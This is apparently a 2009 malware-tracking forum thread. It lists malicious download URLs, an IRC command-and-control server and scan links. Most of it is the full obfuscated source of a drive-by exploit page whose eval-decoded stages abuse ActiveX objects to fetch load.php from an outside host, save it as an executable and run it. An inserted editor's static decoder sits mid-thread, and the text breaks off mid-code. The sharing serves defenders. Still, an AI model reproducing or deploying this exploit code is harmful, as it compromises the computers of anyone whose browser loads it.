onlinerobosphere.cn/zsa360/winconfig.dll

212.117.165.126

platinumsecurityupdate.com/zsa360/winconfig.dll
Title: Re: daily something......
Post by: SysAdMini on April 05, 2009, 06:36:14 pm
Worm Win32/Boupke / Kernelbot (MS08-067)
Code: [Select]
freegoogla.vicp.net/download/em_setup.exe
http://www.virustotal.com/analisis/b58be0446e889229f163a6364e6279b1

Code: [Select]
94.23.93.6/firefox.exe
http://www.virustotal.com/analisis/0ff709c880ddbb9c8aa71d67593a0921 (2/40)
AntiVir    7.9.0.138    2009.04.05    TR/Crypt.XPACK.Gen
McAfee-GW-Edition    6.7.6    2009.04.03    Win32.Malware.dam (suspicious)
http://www.threatexpert.com/report.aspx?md5=39ee3f7eb571d59250df79914a7e8dbb

Code: [Select]
94.23.93.6/IEXPLORE.exe
http://www.virustotal.com/analisis/ffab02c5126508421194fcf00c6d50d1 (5/40)
http://www.threatexpert.com/report.aspx?md5=825cd2850f2d0d60d142adb65b35f575

Code: [Select]
irc.C3llBl0ck.com Port 9595
C&C for the firefox.exe and IEXPLORE.exe above.
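Editor's added example, not code from any poster in this thread: a static decoder for the obfuscation scheme on the 233242.com/1/ exploit page quoted in the next post. Each stage of that page hides "eval" in a `<b>` padded with filler characters, hides the real script in a `<div>` as a dot-separated list of decimal character codes, ROT13s any letters (the page's `(((c & 223) - 52) % 26 + (c & 32) + 65` is ROT13; the payloads are digit-only, so letters would only decode to NUL), maps every token through `String.fromCharCode`, and hands the result to `eval`. The decoder below repeats those steps offline without ever calling `eval`, then pulls URLs, classids and file paths out of the decoded text. Assumptions: the `<b>`/`<div>` pairs are matched by order with regexes rather than a DOM (the loader itself only reads their innerHTML), and the sample is constructed by trimming the page's first encoded block to four of its lines.

```javascript
// Added example (not from the thread): static decoder for the dotted
// char-code obfuscation used by the 233242.com/1/ page. Never calls eval.

// Constructed sample: the <b>/<div> shape of stage 1 of the page, with the
// <div> trimmed to four lines excerpted from the page's first encoded block
// (the real block runs to several thousand codes).
const SAMPLE_HTML = [
  '<style>.dsA86BSFIK_41K{display:none;}</style>',
  '<b class="dsA86BSFIK_41K" id="K_41K1">*e!***v*!*a*l!*</b>',
  '<div class="dsA86BSFIK_41K" id="dsA86BSFIK_41K">' + [
    '13.10.118.97.114.32.75.95.52.49.75.65.113.112.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59',
    '13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.115.105.100.58.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.41.59',
    '13.10.75.95.52.49.75.71.113.112.46.111.112.101.110.40.34.71.69.84.34.44.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.44.102.97.108.115.101.41.59',
    '13.10.118.97.114.32.75.95.52.49.75.72.113.112.32.61.32.34.67.58.92.92.78.84.68.69.84.69.67.84.46.69.88.69.34.59',
  ].join('.') + '</div>',
].join('\n');

// The page's per-letter transform, written out so it can be checked against
// its one-liner: clear bit 5 to upper-case, rotate by 13, restore the case bit.
function rot13(text) {
  return text.replace(/[A-Za-z]/g, (ch) => {
    const c = ch.charCodeAt(0);
    return String.fromCharCode((((c & 223) - 52) % 26) + (c & 32) + 65);
  });
}

// Dotted decimal codes -> string. A non-numeric token becomes NUL, exactly
// as String.fromCharCode(NaN) does in the browser.
function decodeDottedCodes(text) {
  return rot13(text)
    .split('.')
    .map((tok) => String.fromCharCode(Number(tok)))
    .join('');
}

// Recover the dispatcher name ("eval") from the filler-padded <b> text.
// The page strips a different filler set per stage (*, @, ^); stripping
// every non-letter covers all of them.
function dispatcherName(bInner) {
  return bInner.replace(/[^A-Za-z]/g, '');
}

// Decode every stage on a page: the i-th <b> is paired with the i-th <div>,
// which is how the loader's own getElementById calls line up.
function decodeStages(html) {
  const bRe = /<b\b[^>]*>([\s\S]*?)<\/b>/g;
  const divRe = /<div[^>]*id="([^"]+)"[^>]*>([\s\S]*?)<\/div>/g;
  const bs = [...html.matchAll(bRe)].map((m) => m[1]);
  return [...html.matchAll(divRe)].map((m, i) => ({
    id: m[1],
    dispatcher: dispatcherName(bs[i] || ''),
    decoded: decodeDottedCodes(m[2]),
  }));
}

// Triage: pull the indicators an analyst wants out of the decoded script.
// Paths in the decoded JS source carry doubled backslashes; collapse them.
function extractIndicators(decoded) {
  return {
    urls: decoded.match(/https?:\/\/[^\s'"]+/g) || [],
    clsids: decoded.match(/clsid:[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}/gi) || [],
    paths: (decoded.match(/[A-Za-z]:\\\\[^"']+/g) || []).map((p) => p.replace(/\\\\/g, '\\')),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of decodeStages(SAMPLE_HTML)) {
    console.log(`stage ${s.id}: dispatcher=${s.dispatcher}`);
    console.log(s.decoded);
    console.log(extractIndicators(s.decoded));
  }
}
```

On the trimmed sample this yields `dispatcher=eval`, a script that creates an `object` element, sets its classid to `clsid:BD96C556-65A3-11D0-983A-00C04FC29E36`, opens a GET to `http://233242.com/1/load.php` and names `C:\NTDETECT.EXE` as the drop path; run it over the full page source to see the remaining stages, which all fetch the same load.php. Feeding the full `<div>` text to `decodeDottedCodes` is safe because nothing here executes the result.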
Title: Re: daily something......
Post by: CM_MWR on April 05, 2009, 06:45:34 pm
233242.com/1/include/spl.php?do=foxit
233242.com/1/index.php
233242.com/1/load.php
http://www.virustotal.com/analisis/94c84868ce8339d909b4b344275e1710

I believe it reports to

newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099
233242.com/1/
Code: [Select]
<style>.dsA86BSFIK_41K{display:none;}</style>
<b class="dsA86BSFIK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="dsA86BSFIK_41K" id="dsA86BSFIK_41K">13.10.118.97.114.32.75.95.52.49.75.65.113.112.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.118.97.114.32.75.95.52.49.75.66.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.37.52.49.68.37.52.70.68.66.37.50.101.83.116.114.101.97.37.54.68.34.41.59.32.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.65.113.112.39.41.59.13.10.118.97.114.32.75.95.52.49.75.67.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.109.115.120.109.108.50.46.88.37.52.68.76.72.37.53.52.84.80.34.41.59.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.115.105.100.58.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.113.112.32.61.32.48.59.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.44.34.34.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.33.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.61.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.70.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.44.34.34.41.59.13.10.118.97.114
.32.75.95.52.49.75.75.113.112.32.61.32.48.120.55.70.70.70.70.70.70.69.59.13.10.118.97.114.32.75.95.52.49.75.71.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.67.113.112.41.59.13.10.75.95.52.49.75.71.113.112.46.111.112.101.110.40.34.71.69.84.34.44.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.44.102.97.108.115.101.41.59.32.13.10.75.95.52.49.75.71.113.112.46.115.101.110.100.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.69.113.112.46.111.112.101.110.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.87.114.105.116.101.40.75.95.52.49.75.71.113.112.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.72.113.112.32.61.32.34.67.58.92.92.78.84.68.69.84.69.67.84.46.69.88.69.34.59.13.10.75.95.52.49.75.69.113.112.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.72.113.112.44.50.41.59.32.13.10.75.95.52.49.75.69.113.112.46.99.108.111.115.101.40.41.59.13.10.75.95.52.49.75.70.113.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.75.95.52.49.75.72.113.112.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("dsA86BSFIK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.kUbS1mK_41K{display:none;}</style>
<b class="kUbS1mK_41K" id="K_41K1">@e!@@@v@!@a@l!@</b>
<script>window.onerror = return(true);</script>
<div class="kUbS1mK_41K" id="kUbS1mK_41K">75.95.52.49.75.97.110.114.40.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.97.110.114.40.41.32.123.13.10.118.97.114.32.75.95.52.49.75.98.110.114.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.98.110.114.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.39.43.39.115.105.39.43.34.100.58.66.68.34.43.34.57.54.67.53.34.43.39.53.54.45.54.53.65.51.45.49.39.43.34.49.68.48.45.57.56.34.43.39.51.65.45.48.48.39.43.34.67.48.52.34.43.39.70.67.50.39.43.34.57.69.34.43.39.51.54.39.41.59.13.10.116.114.121.32.123.13.10.118.97.114.32.75.95.52.49.75.67.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.109.115.39.43.34.120.109.34.43.39.108.50.39.43.34.46.34.43.39.88.77.39.43.34.76.72.34.43.39.84.39.43.39.84.80.39.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.34.43.34.108.46.65.112.34.43.34.112.108.34.43.34.105.99.97.116.105.34.43.34.111.110.34.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.69.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.97.100.39.43.39.111.100.39.43.34.98.46.34.43.39.115.116.39.43.34.114.101.34.43.39.97.109.39.44.39.39.41.59.13.10.116.114.121.32.123.32.75.95.52.49.75.69.110.114.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.67.110.114.46.111.112.101.110.40.39.71.39.43.34.69.34.43.39.84.39.44.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.44.102.97.108.115.101.41.59.13.10.75.95.52.49.75.67.110.114.46.115.101.110.100.40.41.59.32.75.95.52.49.75.69.110.114.46.111
.112.101.110.40.41.59.13.10.75.95.52.49.75.69.110.114.46.87.114.105.116.101.40.75.95.52.49.75.67.110.114.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.70.110.114.32.61.32.39.46.47.47.46.46.47.47.115.118.99.104.111.115.116.46.101.120.101.39.59.13.10.75.95.52.49.75.69.110.114.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.70.110.114.44.50.41.59.13.10.75.95.52.49.75.69.110.114.46.67.108.111.115.101.40.41.59.13.10.125.32.99.97.116.99.104.40.101.41.32.123.125.13.10.116.114.121.32.123.32.75.95.52.49.75.68.110.114.46.115.104.101.108.108.101.120.101.99.117.116.101.40.75.95.52.49.75.70.110.114.41.59.32.125.32.99.97.116.99.104.40.101.41.32.123.125.125.13.10.99.97.116.99.104.40.101.41.123.125.125</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|@]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("kUbS1mK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.IkZaQm6AojiWK_41K{display:none;}</style>
<b class="IkZaQm6AojiWK_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="IkZaQm6AojiWK_41K" id="IkZaQm6AojiWK_41K">13.10.118.97.114.32.75.95.52.49.75.65.101.119.61.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.66.101.119.40.111.44.110.41.123.13.10.118.97.114.32.114.61.110.117.108.108.59.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.34.34.44.110.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.125.114.101.116.117.114.110.40.114.41.59.13.10.125.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.67.101.119.40.97.41.123.13.10.102.110.97.109.101.61.34.102.105.108.101.46.101.120.101.34.59.118.97.114.32.75.95.52.49.75.68.101.119.61.97.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.99.114.105.112.116.105.110.103.46.70.105.108.101.83.121.115.116.101.109.79.98.106.101.99.116.34.44.34.34.41.59.118.97.114.32.115.97.112.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.118.97.114.32.120.61.75.95.52.49.75.66.101.119.40.97.44.34.65.68.79.68.66.46.83.116.114.101.97.109.34.41.59.118.97.114.32.75.95.52.49.75.69.101.119.61.110.117.108.108.59.102.110.97.109.101.61.75.95.52.49.75.68.101.119.46.66.11
7.105.108.100.80.97.116.104.40.75.95.52.49.75.68.101.119.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.40.50.41.44.102.110.97.109.101.41.59.120.46.77.111.100.101.61.51.59.13.10.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.105.99.114.111.115.111.102.116.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.83.101.114.118.101.114.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.13.10.123.13.10.116.114.121.13.10.123.13.10.75.95.52.49.75.69.101.119.61.110.101.119.32.88.77.76.72.116.116.112.82.101.113.117.101.115.116.40.41.59.13.10.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.114.101.116.117.114.110.32.48.59.125.125.125.125.13.10.120.46.84.121.112.101.61.49.59.75.95.52.49.75.69.101.119.46.115.101.110.100.40.110.117.108.108.41.59.114.98.61.75.95.52.49.75.69.101.119.46.114.101.115.112.111.110.115.101.66.111.100.121.59.120.46.79.112.101.110.40.41.59.120.46.87.114.105.116.101.40.114.98.41.59.120.46.83.97.118.101.84.111.102.105.108.101.40.102.110.97.109.101.44.50.41.59.115.97.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.102.110.97.109.101.41.59.13.10.114.101.116.117.114.110.32.49.59.13.10.125.13.10.102.117.110.99.116.105.111.1
10.32.75.95.52.49.75.70.101.119.40.41.123.13.10.118.97.114.32.105.61.48.59.118.97.114.32.75.95.52.49.75.71.101.119.61.110.101.119.32.65.114.114.97.121.40.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.44.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.48.39.44.39.65.66.57.66.67.69.68.68.45.69.67.55.69.45.52.55.69.49.45.57.51.50.50.45.68.52.65.50.49.48.54.49.55.49.49.54.39.44.39.48.48.48.54.70.48.51.51.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.48.48.48.54.70.48.51.65.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.54.101.51.50.48.55.48.97.45.55.54.54.100.45.52.101.101.54.45.56.55.57.99.45.100.99.49.102.97.57.49.100.50.102.99.51.39.44.39.54.52.49.52.53.49.50.66.45.66.57.55.56.45.52.53.49.68.45.65.48.68.56.45.70.67.70.68.70.51.51.69.56.51.51.67.39.44.39.55.70.53.66.55.70.54.51.45.70.48.54.70.45.52.51.51.49.45.56.65.50.54.45.51.51.57.69.48.51.67.48.65.69.51.68.39.44.39.48.54.55.50.51.69.48.57.45.70.52.67.50.45.52.51.99.56.45.56.51.53.56.45.48.57.70.67.68.49.68.66.48.55.54.54.39.44.39.54.51.57.70.55.50.53.70.45.49.66.50.68.45.52.56.51.49.45.65.57.70.68.45.56.55.52.56.52.55.54.56.50.48.49.48.39.44.39.66.65.48.49.56.53.57.57.45.49.68.66.51.45.52.52.102.57.45.56.51.66.52.45.52.54.49.52.53.52.67.56.52.66.70.56.39.44.39.68.48.67.48.55.68.53.54.45.55.67.54.57.45.52.51.70.49.45.66.52.65.48.45.50.53.70.53.65.49.49.70.65.66.49.57.39.44.39.69.56.67.67.67.68.68.70.45.67.65.50.56.45.52.57.54.98.45.66.48.53.48.45.54.67.48.55.67.57.54.50.52.55.54.66.39.44.110.117.108.108.41.59.13.10.119.104.105.108.101.40.75.95.52.49.75.71.101.119.91.105.93.41.13.10.123.13.10.118.97.114.32.97.61.110.117.108.108.59.13.10.97.61.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.34.111.98.106.101.99.116.34.41.59.13.10.97.46.115.101.116.65.116.116.114.
105.98.117.116.101.40.34.99.108.97.115.115.105.100.34.44.34.99.108.115.105.100.58.34.43.75.95.52.49.75.71.101.119.91.105.93.41.59.13.10.105.102.40.97.41.123.116.114.121.123.118.97.114.32.98.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.13.10.105.102.40.98.41.123.105.102.40.75.95.52.49.75.67.101.119.40.97.41.41.114.101.116.117.114.110.32.49.59.125.125.99.97.116.99.104.40.101.41.123.125.125.13.10.105.43.43.59.13.10.125.13.10.125.13.10.105.102.40.75.95.52.49.75.70.101.119.40.41.41.32.115.117.99.99.101.115.115.61.49.59.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("IkZaQm6AojiWK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script><script>
<style>.QIgskwBJjInK_41K{display:none;}</style>
<b class="QIgskwBJjInK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="QIgskwBJjInK_41K" id="QIgskwBJjInK_41K">100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.117.110.101.115.99.97.112.101.40.34.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.118.98.115.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.51.68.51.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.84.121.112.101.66.105.110.97.114.121.37.51.68.49.37.48.68.37.48.65.67.111.110.115.116.37.48.68.37.48.65.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.51.68.50.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.70.83.79.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.83.116.114.101.97.109.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.87.83.104.101.108.108.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.99.66.121.116.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.78.97.109.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.80.114.111.103.37.48.68.37.48.65.79.98.106.78.97.109.101.37.51.68.37.50.50.65.68.79.68.66.37.50.50.37.48.68.37.48.65.79.98.106.80.114.111.103.37.51.68.37.50.50.83.116.114.101.97.109.37.50.50.37.48.68.37.48.65.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.83.101.116.37.50.48.111.83.116.114.101.97.109.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.79.98.106.78.97.109.101.37.50.48.37.50.54.37.50.48.37.50.50.46.37.50.50.37.50.48.37.50.54.37.50.48.79.98.106.80.114.111.103.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.73.102.37.50.48.69.114.114.46.110.117.109.98.101.114.37.50.48.37.51.67.37.51.69.37.50.48.48.37.50.48.84.104.101.110.37.48.68.37.48.65.83.101.116.37.50.48.111.70.83.79.37.51.68.119.105.110.100.1
11.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.83.99.114.105.112.116.105.110.103.46.70.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.108.101.83.121.115.116.101.109.79.98.106.101.99.116.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.83.101.116.37.50.48.80.108.117.103.105.110.70.105.108.101.37.51.68.111.70.83.79.46.67.114.101.97.116.101.84.101.120.116.70.105.108.101.37.50.56.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.37.48.68.37.48.65.84.82.85.69.37.50.57.37.48.68.37.48.65.80.108.117.103.105.110.95.115.105.122.101.37.51.68.76.101.110.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.57.37.48.68.37.48.65.37.48.68.37.48.65.70.111.114.37.50.48.106.37.51.68.49.37.50.48.84.111.37.50.48.80.108.117.103.105.110.95.115.105.122.101.37.48.68.37.48.65.37.50.48.37.50.48.99.66.121.116.101.37.51.68.77.105.100.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.67.106.37.50.67.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.66.121.116.101.67.111.100.101.37.51.68.65.115.99.66.37.50.56.99.66.121.116.101.37.50